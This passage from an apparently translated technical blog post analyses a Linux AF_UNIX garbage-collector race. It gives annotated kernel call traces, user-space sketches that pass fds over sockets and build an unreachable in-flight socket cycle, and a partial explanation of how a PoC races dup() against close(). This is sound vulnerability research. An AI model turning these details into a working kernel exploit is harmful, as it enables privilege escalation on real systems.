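<li>The <code>file</code> behind each passed <code>fd</code> is attached to the <code>skb</code>, which holds a reference on it (<code>f_count</code> is incremented by 1)</li>
<li><code>recvmsg</code> takes the <code>skb</code> from <code>sk_receive_queue</code></li>
<li><code>unix_gc</code> starts from <code>gc_inflight_list</code> to find the in-flight sockets and the <code>skb</code>s that carry them</li>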
</ul>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// net/socket.c, then net/unix/af_unix.c</span></span><br><span class="line">sendmsg() -> __sys_sendmsg() -> sock_sendmsg() -> sock_sendmsg_nosec()</span><br><span class="line">  -> <span class="comment">// sock->ops->sendmsg</span></span><br><span class="line">  unix_stream_sendmsg()                     <span class="comment">// unix_stream_ops.sendmsg</span></span><br><span class="line">    __scm_send()</span><br><span class="line">      scm_fp_copy()</span><br><span class="line">        fget_raw(fd)</span><br><span class="line">          ...</span><br><span class="line">            __fget_files()              <span class="comment">// take one reference on each passed file</span></span><br><span class="line">    other = unix_peer(sk);</span><br><span class="line">    skb = sock_alloc_send_pskb()</span><br><span class="line">    unix_scm_to_skb()</span><br><span class="line">      unix_attach_fds()                 <span class="comment">// bind the files to the skb</span></span><br><span class="line">        unix_inflight()</span><br><span class="line">          list_add_tail(&u->link, &gc_inflight_list);  <span class="comment">// the list unix_gc() walks</span></span><br><span class="line">      skb->destructor = unix_destruct_scm;             <span class="comment">// register the skb destructor</span></span><br><span class="line">    skb_queue_tail(&other->sk_receive_queue, skb);     <span class="comment">// queue the skb directly on the peer's sk_receive_queue</span></span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">recvmsg() -> __sys_recvmsg() -> ...</span><br><span class="line">  -> <span class="comment">// sock->ops->recvmsg</span></span><br><span class="line">  unix_stream_recvmsg()</span><br><span class="line">    unix_stream_read_generic()</span><br><span class="line">      last = skb = skb_peek(&sk->sk_receive_queue);  <span class="comment">// take the skb</span></span><br><span class="line">      scm_recv()                                      <span class="comment">// handle the passed fds</span></span><br><span class="line">        scm_detach_fds()</span><br><span class="line">          receive_fd_user()                           <span class="comment">// install the received fd</span></span><br><span class="line">            ...</span><br><span class="line">              fd_install(new_fd, get_file(file));</span><br><span class="line">        __scm_destroy()                               <span class="comment">// drop the file references carried by the skb</span></span><br><span class="line">          fput()</span><br><span class="line">            fput_many()</span><br></pre></td></tr></table></figure>
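<p>For reference, the user-space side of this flow can be sketched as below. This is a minimal sketch, not code from the original PoC: <code>scm_send_fd</code>, <code>scm_recv_fd</code>, <code>scm_rights_demo</code> and <code>union fd_ctrl</code> are hypothetical names, and the demo assumes Linux with <code>AF_UNIX</code> stream sockets. After <code>close(p[1])</code>, the only reference to the pipe's write end is the one held by the queued <code>skb</code>, so the file stays alive until <code>recvmsg()</code> installs it as a new fd.</p>

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Control buffer with the alignment struct cmsghdr needs (pattern from cmsg(3)). */
union fd_ctrl {
    char buf[CMSG_SPACE(sizeof(int))];
    struct cmsghdr align;
};

/* Send one fd over a Unix socket as SCM_RIGHTS ancillary data. */
static int scm_send_fd(int sock, int fd)
{
    char byte = 'x';   /* a stream socket needs at least one byte of real data */
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union fd_ctrl ctrl;
    memset(&ctrl, 0, sizeof(ctrl));

    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = ctrl.buf, .msg_controllen = sizeof(ctrl.buf),
    };
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one fd sent with scm_send_fd(); returns the new fd or -1. */
static int scm_recv_fd(int sock)
{
    char byte;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union fd_ctrl ctrl;
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = ctrl.buf, .msg_controllen = sizeof(ctrl.buf),
    };
    if (recvmsg(sock, &msg, 0) != 1)
        return -1;

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET || cmsg->cmsg_type != SCM_RIGHTS)
        return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));  /* CMSG_DATA may be unaligned */
    return fd;
}

/* Pass a pipe's write end through a socketpair after closing the original fd. */
static int scm_rights_demo(void)
{
    int sv[2], p[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0 || pipe(p) < 0)
        return -1;
    if (scm_send_fd(sv[0], p[1]) < 0)
        return -1;
    close(p[1]);                    /* now only the in-flight skb holds the file */

    int w = scm_recv_fd(sv[1]);     /* new fd table entry, same struct file */
    if (w < 0 || write(w, "ok", 2) != 2)
        return -1;

    char buf[2];
    int ok = read(p[0], buf, 2) == 2 && memcmp(buf, "ok", 2) == 0;
    close(w);
    close(p[0]);
    close(sv[0]);
    close(sv[1]);
    return ok ? 0 : -1;
}
```

<p>Because the sender closes its own fd before the receiver calls <code>recvmsg()</code>, a successful <code>write()</code> through the received fd shows that the in-flight reference alone kept the <code>struct file</code> alive.</p>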
<p><strong>How are <code>struct sk_buff *skb</code>, <code>struct unix_sock *u</code>, <code>struct socket *sock</code>, <code>struct sock *sk</code> and <code>struct file *file</code> related?</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// file -> socket (this is SOCKET_I(file->f_inode))</span></span><br><span class="line"><span class="keyword">struct</span> socket *sock = &container_of(file->f_inode, <span class="keyword">struct</span> socket_alloc, vfs_inode)->socket;</span><br><span class="line"><span class="keyword">struct</span> sock *sk = sock->sk;</span><br><span class="line"><span class="comment">// struct unix_sock starts with struct sock, so the cast is valid (this is unix_sk(sk))</span></span><br><span class="line"><span class="keyword">struct</span> unix_sock *u = (<span class="keyword">struct</span> unix_sock *)sk;</span><br><span class="line"><span class="comment">// unix_sock -> the socket's own file</span></span><br><span class="line"><span class="keyword">struct</span> file *sock_file = u->sk.sk_socket->file;</span><br><span class="line"><span class="comment">// the i-th file carried by an skb, i.e. UNIXCB(skb).fp->fp[i]</span></span><br><span class="line"><span class="keyword">struct</span> file *passed_file = (*(<span class="keyword">struct</span> unix_skb_parms *)&((skb)->cb)).fp->fp[i];</span><br></pre></td></tr></table></figure>
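<p>The pointer arithmetic above can be tried out in user space with stand-in structures. This is an illustrative sketch: the <code>model_*</code> types and functions are hypothetical, heavily simplified versions of <code>struct socket_alloc</code>, <code>struct unix_sock</code>, <code>SOCKET_I()</code> and <code>unix_sk()</code>, and <code>container_of</code> is reduced to its <code>offsetof</code> core without the kernel's type checks.</p>

```c
#include <assert.h>
#include <stddef.h>

/* The core of the kernel's container_of(), without its compile-time type checks. */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Hypothetical, heavily simplified stand-ins for the kernel structures. */
struct model_sock { int sk_type; };

struct model_unix_sock {            /* like struct unix_sock: struct sock comes first */
    struct model_sock sk;
    long inflight;
};

struct model_inode { unsigned long i_ino; };
struct model_socket { struct model_sock *sk; };

struct model_socket_alloc {         /* like struct socket_alloc */
    struct model_socket socket;
    struct model_inode vfs_inode;
};

/* Like SOCKET_I(): from the embedded inode back to the socket next to it. */
static struct model_socket *model_SOCKET_I(struct model_inode *inode)
{
    return &container_of(inode, struct model_socket_alloc, vfs_inode)->socket;
}

/* Like unix_sk(): valid only because sk is the first member. */
static struct model_unix_sock *model_unix_sk(struct model_sock *sk)
{
    return (struct model_unix_sock *)sk;
}
```

<p>Both conversions are plain address arithmetic: <code>container_of</code> subtracts the member offset, and the <code>unix_sk()</code>-style cast needs no arithmetic at all because the offset of the first member is 0.</p>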
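<h3 id="unix-gc-做了什么?"><a href="#unix-gc-做了什么?" class="headerlink" title="unix_gc() 做了什么?"></a>What does <code>unix_gc()</code> do?</h3><ul>
<li>Walk <code>gc_inflight_list</code> to get each in-flight <code>unix_sock</code><ul>
<li>Move every <code>unix_sock</code> that meets the condition below to <code>gc_candidates</code></li>
<li>Condition: the reference count of the socket's file (<code>file_count()</code>) equals the socket's in-flight count (<code>u-&gt;inflight</code>), i.e. every remaining reference comes from an <code>skb</code> in flight</li>
</ul>
</li>
<li>Walk <code>gc_candidates</code><ul>
<li>Move the <code>skb</code>s that carry the (unreachable) candidates to <code>hitlist</code></li>
</ul>
</li>
<li>Free the <code>skb</code>s on <code>hitlist</code> together with the <code>struct file</code>s attached to them</li>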
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">unix_gc()</span><br><span class="line">  <span class="keyword">struct</span> sk_buff_head hitlist;</span><br><span class="line">  ...</span><br><span class="line">  list_for_each_entry_safe(u, next, &gc_inflight_list, link) {</span><br><span class="line">      total_refs = file_count(u->sk.sk_socket->file);</span><br><span class="line">      inflight_refs = atomic_long_read(&u->inflight);</span><br><span class="line">      <span class="keyword">if</span> (total_refs == inflight_refs)   <span class="comment">// every reference is held by in-flight skbs</span></span><br><span class="line">          list_move_tail(&u->link, &gc_candidates);</span><br><span class="line">  }</span><br><span class="line">  ...</span><br><span class="line"></span><br><span class="line">  skb_queue_head_init(&hitlist);</span><br><span class="line">  list_for_each_entry(u, &gc_candidates, link)</span><br><span class="line">      scan_children(&u->sk, inc_inflight, &hitlist);</span><br><span class="line">        scan_inflight(&u->sk, func, hitlist);</span><br><span class="line">          __skb_queue_tail(hitlist, skb);</span><br><span class="line">  ...</span><br><span class="line">  __skb_queue_purge(&hitlist);</span><br><span class="line">    kfree_skb(skb);</span><br></pre></td></tr></table></figure>
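<p>To make the candidate rule concrete, here is a simplified user-space model of the algorithm. It is a sketch under assumptions, not kernel code: <code>struct model_usock</code>, <code>model_unix_gc()</code> and <code>poc_scenario()</code> are hypothetical, there is no locking, and each socket simply lists which sockets are carried by the skbs in its receive queue. Besides the two walks described above, the model includes the intermediate step in which the kernel drops the references candidates hold on each other (<code>dec_inflight</code>) and un-marks candidates that are still reachable from a live socket (<code>inc_inflight_move_tail</code>); without it, a socket queued on a live socket would be collected wrongly.</p>

```c
#include <assert.h>
#include <stdbool.h>

#define MODEL_MAX 8

/* Hypothetical model of an AF_UNIX socket, for illustration only. */
struct model_usock {
    long total_refs;        /* models file_count(u->sk.sk_socket->file) */
    long inflight;          /* models u->inflight: refs held by in-flight skbs */
    int queued[MODEL_MAX];  /* sockets carried by skbs in this socket's receive queue */
    int nqueued;
    bool candidate;
};

/* Simplified model of unix_gc(); returns how many sockets are garbage.
 * garbage[i] marks sockets whose skbs would end up on the hitlist.
 * Unlike the kernel, the model does not restore the inflight counters. */
static int model_unix_gc(struct model_usock *s, int n, bool garbage[])
{
    /* 1. every remaining reference comes from an in-flight skb -> candidate */
    for (int i = 0; i < n; i++)
        s[i].candidate = s[i].inflight > 0 && s[i].total_refs == s[i].inflight;

    /* 2a. drop the in-flight references candidates hold on each other
     *     (kernel: scan_children(&u->sk, dec_inflight, NULL)) */
    for (int i = 0; i < n; i++)
        if (s[i].candidate)
            for (int j = 0; j < s[i].nqueued; j++)
                if (s[s[i].queued[j]].candidate)
                    s[s[i].queued[j]].inflight--;

    /* 2b. a candidate with references left is reachable from a live socket:
     *     un-mark it and give its candidate children their references back */
    bool changed = true;
    while (changed) {
        changed = false;
        for (int i = 0; i < n; i++) {
            if (!s[i].candidate || s[i].inflight == 0)
                continue;
            s[i].candidate = false;
            changed = true;
            for (int j = 0; j < s[i].nqueued; j++)
                if (s[s[i].queued[j]].candidate)
                    s[s[i].queued[j]].inflight++;
        }
    }

    /* 3. whatever is still a candidate is unreachable garbage */
    int count = 0;
    for (int i = 0; i < n; i++) {
        garbage[i] = s[i].candidate;
        count += garbage[i];
    }
    return count;
}

/* The PoC's state after close(pair[0]): pair[0] sits in its own receive queue. */
static int poc_scenario(long pair0_total_refs)
{
    struct model_usock s[2] = {0};
    bool garbage[2];
    s[0].total_refs = pair0_total_refs;  /* 1 after close(pair[0]); 2 if a dup() got in first */
    s[0].inflight = 1;
    s[0].queued[0] = 0;                  /* sent over pair[1], so queued on pair[0] itself */
    s[0].nqueued = 1;
    s[1].total_refs = 1;                 /* pair[1] is still open */
    return model_unix_gc(s, 2, garbage);
}
```

<p><code>poc_scenario(1)</code> reports one garbage socket, while <code>poc_scenario(2)</code> reports none: the same state stops being garbage once a <code>dup()</code> has raised the file count to 2. A GC that read <code>file_count()</code> just before that increment therefore acts on a stale decision.</p>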
<p><strong>Where does unix_gc() free the file and the skb?</strong> </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">unix_gc()</span><br><span class="line">  ...</span><br><span class="line">  skb_queue_head_init(&hitlist);</span><br><span class="line">  list_for_each_entry(u, &gc_candidates, link)    <span class="comment">// move the skbs of gc_candidates to hitlist</span></span><br><span class="line">      scan_children(&u->sk, inc_inflight, &hitlist);</span><br><span class="line">        scan_inflight(&u->sk, func, hitlist);</span><br><span class="line">          __skb_queue_tail(hitlist, skb);</span><br><span class="line">  ...</span><br><span class="line">  __skb_queue_purge(&hitlist);</span><br><span class="line">    kfree_skb(skb);</span><br><span class="line">      ...</span><br><span class="line">        skb->destructor()                 <span class="comment">// installed in sendmsg</span></span><br><span class="line">          unix_destruct_scm()</span><br><span class="line">            scm_destroy()</span><br><span class="line">              __scm_destroy()</span><br><span class="line">                fput()                    <span class="comment">// if f_count is 1, it drops to 0 and the file is released</span></span><br><span class="line">        kfree_skbmem()</span><br><span class="line">          kmem_cache_free(.., skb)        <span class="comment">// free the skb</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// unix_destruct_scm is installed during sendmsg</span></span><br><span class="line">sendmsg()</span><br><span class="line">  __sys_sendmsg()</span><br><span class="line">    sock_sendmsg()</span><br><span class="line">      sock_sendmsg_nosec()</span><br><span class="line">        unix_stream_sendmsg()             <span class="comment">// unix_stream_ops.sendmsg</span></span><br><span class="line">          skb = sock_alloc_send_pskb()</span><br><span class="line">          unix_scm_to_skb()</span><br><span class="line">            skb->destructor = unix_destruct_scm;</span><br></pre></td></tr></table></figure>
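<p>The destructor chain above (the skb holds file references, <code>kfree_skb()</code> runs <code>skb-&gt;destructor</code>, which ends in <code>fput()</code>) can be modelled as follows. All <code>model_*</code> names are hypothetical; the model releases the file synchronously, whereas the kernel's <code>fput()</code> defers the release (see the <code>close()</code> section).</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stdlib.h>

/* Hypothetical stand-ins: a refcounted file and an skb that carries files. */
struct model_file { long f_count; bool released; };

struct model_skb {
    struct model_file *fp[4];
    int nfp;
    void (*destructor)(struct model_skb *skb);
};

static void model_fput(struct model_file *f)
{
    if (--f->f_count == 0)
        f->released = true;          /* the kernel would run __fput() here (deferred) */
}

/* Plays the role of unix_destruct_scm(): drop the references the skb holds. */
static void model_destruct_scm(struct model_skb *skb)
{
    for (int i = 0; i < skb->nfp; i++)
        model_fput(skb->fp[i]);
}

/* Plays the role of kfree_skb(): run the destructor, then free the skb memory. */
static void model_kfree_skb(struct model_skb *skb)
{
    if (skb->destructor)
        skb->destructor(skb);
    free(skb);                       /* kfree_skbmem() -> kmem_cache_free() */
}

/* "sendmsg" side: attach a file (taking a reference) and install the destructor. */
static struct model_skb *model_alloc_skb_with_file(struct model_file *f)
{
    struct model_skb *skb = calloc(1, sizeof(*skb));
    if (skb == NULL)
        return NULL;
    f->f_count++;
    skb->fp[skb->nfp++] = f;
    skb->destructor = model_destruct_scm;
    return skb;
}
```

<p>Usage: attach a file with <code>f_count == 1</code>, drop the fd's own reference with <code>model_fput()</code>, and the file survives until <code>model_kfree_skb()</code>, the per-skb step of <code>__skb_queue_purge(&amp;hitlist)</code>, drops the last reference.</p>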
<h3 id="unix-gc-何时被调用?"><a href="#unix-gc-何时被调用?" class="headerlink" title="unix_gc() 何时被调用?"></a>When is <code>unix_gc()</code> called?</h3><ul>
<li><code>close()</code> can trigger it indirectly<ul>
<li>Concretely, the entry point is <code>syscall_exit_to_user_mode() - __fput()</code>, where the deferred release of the last file reference runs</li>
</ul>
</li>
<li><code>sendmsg()</code> can also trigger it, but only when too many sockets are in flight<ul>
<li><code>sendmsg() - wait_for_unix_gc()</code></li>
</ul>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// triggered when close() drops the last reference (f_count == 1) to a socket file</span></span><br><span class="line"><span class="built_in">close</span>()</span><br><span class="line">  close_fd()</span><br><span class="line">    filp_close()</span><br><span class="line">      fput()</span><br><span class="line">        fput_many(file, <span class="number">1</span>);</span><br><span class="line">          atomic_long_sub_and_test(refs, &file->f_count)</span><br><span class="line">          init_task_work(&file->f_u.fu_rcuhead, ____fput)</span><br><span class="line">          task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)</span><br><span class="line">entry_SYSCALL_64</span><br><span class="line">  do_syscall_64</span><br><span class="line">    syscall_exit_to_user_mode</span><br><span class="line">      ...</span><br><span class="line">        tracehook_notify_resume</span><br><span class="line">          task_work_run()</span><br><span class="line">            __fput()</span><br><span class="line">              sock_close()                <span class="comment">// (struct file *)->f_op->release()</span></span><br><span class="line">                __sock_release()</span><br><span class="line">                  unix_release()          <span class="comment">// (struct socket *)->ops->release()</span></span><br><span class="line">                    unix_release_sock()</span><br><span class="line">                      unix_gc()           <span class="comment">// called only if unix_tot_inflight != 0</span></span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// only called when more than UNIX_INFLIGHT_TRIGGER_GC (16000) sockets are in flight</span></span><br><span class="line">sendmsg()</span><br><span class="line">  ...</span><br><span class="line">    unix_stream_sendmsg()/unix_dgram_sendmsg()</span><br><span class="line">      wait_for_unix_gc()</span><br><span class="line">        <span class="keyword">if</span> (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)</span><br><span class="line">          unix_gc();</span><br></pre></td></tr></table></figure>
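<p>From user space, the <code>close()</code> path can be exercised by building the self-referencing cycle that only <code>unix_gc()</code> can reclaim. This sketch assumes Linux; <code>send_one_fd</code> and <code>make_and_drop_cycle</code> are hypothetical helpers, and whether and when <code>unix_gc()</code> actually runs cannot be observed from user space, so the comments only describe what the call chain above implies.</p>

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Send one fd as SCM_RIGHTS (hypothetical helper, similar in spirit to send_fd() in the PoC). */
static int send_one_fd(int sock, int fd)
{
    char byte = 0;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union { char buf[CMSG_SPACE(sizeof(int))]; struct cmsghdr align; } ctrl;
    memset(&ctrl, 0, sizeof(ctrl));
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = ctrl.buf, .msg_controllen = sizeof(ctrl.buf),
    };
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Build an unreachable in-flight cycle, then drop every fd reference to it. */
static int make_and_drop_cycle(void)
{
    int pair[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, pair) < 0)
        return -1;
    /* the skb lands on the receive queue of pair[0] (the peer of pair[1])
     * and carries pair[0] itself: a self-reference only unix_gc() can break */
    if (send_one_fd(pair[1], pair[0]) < 0)
        return -1;
    /* f_count of pair[0]: 2 -> 1; the remaining reference is the in-flight skb */
    if (close(pair[0]) < 0)
        return -1;
    /* last reference to pair[1]: the deferred __fput() reaches
     * unix_release_sock(), which calls unix_gc() since unix_tot_inflight != 0 */
    return close(pair[1]);
}
```

<p>This is the same cycle the PoC builds on its line 27, without the racing <code>dup()</code>.</p>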
<h3 id="dup-的作用和实现原理?"><a href="#dup-的作用和实现原理?" class="headerlink" title="dup() 的作用和实现原理?"></a>What does dup() do, and how does it work?</h3><ul>
<li>Look up the <code>struct file *file</code> for the fd in the fd table</li>
<li>If <code>f_count</code> is not 0, increment it (<code>file->f_count += 1</code>)</li>
<li>Create a new fd table entry that points to the same <code>file</code></li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">SYSCALL_DEFINE1(dup, <span class="keyword">unsigned</span> <span class="keyword">int</span>, fildes)</span><br><span class="line">  fget_raw()</span><br><span class="line">    __fget(fd, <span class="number">0</span>, <span class="number">1</span>)</span><br><span class="line">      __fget_files(current->files, fd, mask, refs)</span><br><span class="line">        file = files_lookup_fd_rcu(files, fd);   <span class="comment">// look up struct file *file for fd in the fd table</span></span><br><span class="line">        get_file_rcu_many(file, refs)</span><br><span class="line">          atomic_long_add_unless(&(x)->f_count, (cnt), <span class="number">0</span>)   <span class="comment">// if not 0, file->f_count += 1</span></span><br><span class="line">  get_unused_fd_flags()</span><br><span class="line">  fd_install()                                     <span class="comment">// new fd table entry pointing to file</span></span><br></pre></td></tr></table></figure>
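<p>The effect of sharing one <code>struct file</code> can be observed from user space: file status flags such as <code>O_NONBLOCK</code> live in the <code>struct file</code> and are therefore shared by both fds, while <code>FD_CLOEXEC</code> belongs to the fd table entry and is cleared on the duplicate. <code>dup_shares_file()</code> is a hypothetical helper for illustration, assuming POSIX pipes.</p>

```c
#include <assert.h>
#include <fcntl.h>
#include <unistd.h>

/* Returns 1 if dup() shares the struct file but not the per-fd flags, 0 if not, -1 on error. */
static int dup_shares_file(void)
{
    int p[2];
    if (pipe(p) < 0)
        return -1;
    if (fcntl(p[0], F_SETFD, FD_CLOEXEC) < 0)   /* per-fd flag on the original */
        return -1;

    int d = dup(p[0]);                          /* new fd table entry, same struct file */
    if (d < 0)
        return -1;

    int fl = fcntl(p[0], F_GETFL);
    if (fl < 0 || fcntl(p[0], F_SETFL, fl | O_NONBLOCK) < 0)
        return -1;

    /* O_NONBLOCK is stored in the shared struct file, so d sees it too */
    int status_shared = (fcntl(d, F_GETFL) & O_NONBLOCK) != 0;
    /* FD_CLOEXEC is stored in the fd table entry, and dup() leaves it off */
    int cloexec_on_dup = (fcntl(d, F_GETFD) & FD_CLOEXEC) != 0;

    close(d);
    close(p[0]);
    close(p[1]);
    return status_shared && !cloexec_on_dup;
}
```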
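<h3 id="close-的作用和实现原理?"><a href="#close-的作用和实现原理?" class="headerlink" title="close() 的作用和实现原理?"></a>What does <code>close()</code> do, and how does it work?</h3><ul>
<li>Make the fd number available for reuse</li>
<li>Remove the fd's entry from the fd table (set it to NULL)</li>
<li>Decrement the <code>f_count</code> of the <code>struct file</code> the entry pointed to; if it drops to 0, the <code>struct file</code> is freed (the release is deferred to task work, as shown below)</li>
<li><code>close</code> does not necessarily free the <code>struct file</code> right away, but user space can no longer use that <code>fd</code>, e.g. with <code>dup(fd)</code> or <code>read(fd)</code></li>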
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">close</span>()</span><br><span class="line">  close_fd()</span><br><span class="line">    pick_file()</span><br><span class="line">      fdt = files_fdtable(files);</span><br><span class="line">      file = fdt->fd[fd];</span><br><span class="line">      rcu_assign_pointer(fdt->fd[fd], <span class="literal">NULL</span>);   <span class="comment">// remove the fd's entry from the fd table</span></span><br><span class="line">      __put_unused_fd(files, fd);                <span class="comment">// make the fd number reusable</span></span><br><span class="line">    filp_close()</span><br><span class="line">      fput()</span><br><span class="line">        fput_many(file, <span class="number">1</span>);                   <span class="comment">// f_count of the struct file the entry pointed to - 1</span></span><br><span class="line">          atomic_long_sub_and_test(refs, &file->f_count)</span><br><span class="line">          init_task_work(&file->f_u.fu_rcuhead, ____fput)</span><br><span class="line">          task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)</span><br><span class="line"></span><br><span class="line">____fput()</span><br><span class="line">  __fput()</span><br><span class="line">    file_free()</span><br><span class="line">      file_free_rcu()</span><br><span class="line">        kmem_cache_free(filp_cachep, f)          <span class="comment">// if f_count reached 0, free the struct file</span></span><br></pre></td></tr></table></figure>
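<p>A small sketch of the last point, assuming POSIX pipes: after <code>close()</code> the fd number fails with <code>EBADF</code>, while a <code>dup()</code>ed fd keeps the same <code>struct file</code> alive and usable. <code>close_drops_only_fd()</code> is a hypothetical helper; it reuses the closed fd number only because nothing else in this single-threaded example can be assigned that number in between.</p>

```c
#include <assert.h>
#include <errno.h>
#include <unistd.h>

/* Returns 0 if close() removed only the fd while the file lived on, -1 otherwise. */
static int close_drops_only_fd(void)
{
    int p[2];
    if (pipe(p) < 0)
        return -1;
    int d = dup(p[1]);                   /* f_count of the write end is now 2 */
    if (d < 0)
        return -1;

    close(p[1]);                         /* entry cleared, f_count 2 -> 1, file survives */

    errno = 0;
    if (write(p[1], "x", 1) != -1 || errno != EBADF)
        return -1;                       /* the old fd number is no longer usable */
    if (write(d, "x", 1) != 1)
        return -1;                       /* the same struct file still works through d */

    char c;
    int ok = read(p[0], &c, 1) == 1 && c == 'x';
    close(d);
    close(p[0]);
    return ok ? 0 : -1;
}
```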
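<h3 id="增加-kernel-delay-patch-的-poc-如何-work"><a href="#增加-kernel-delay-patch-的-poc-如何-work" class="headerlink" title="增加 kernel delay patch 的 poc 如何 work ?"></a>How does the PoC work with the kernel delay patch applied?</h3><ul>
<li>Line 27 sends <code>pair[0]</code> over <code>pair[1]</code>: the <code>f_count</code> of <code>pair[0]</code>'s file is incremented, its <code>unix_sock</code> is added to <code>gc_inflight_list</code>, and the <code>skb</code> is queued on the <code>sk_receive_queue</code> of the peer, which is <code>pair[0]</code> itself</li>
<li>Lines 29 and 43 only serve to trigger <code>unix_gc()</code>: the GC runs when an fd whose file has <code>f_count</code> 1 is <code>close()</code>d, so a fresh socket is created and later closed</li>
<li>Line 36 waits until <code>resurrect_fn()->dup()->__fget_files()</code> has entered the race window and already holds the <code>struct file</code> pointer, because line 37 removes <code>pair[0]</code> from the fd table. The <code>usleep()</code> of 100000 µs (100 ms) must be shorter than the 500 ms <code>mdelay()</code> in the kernel patch</li>
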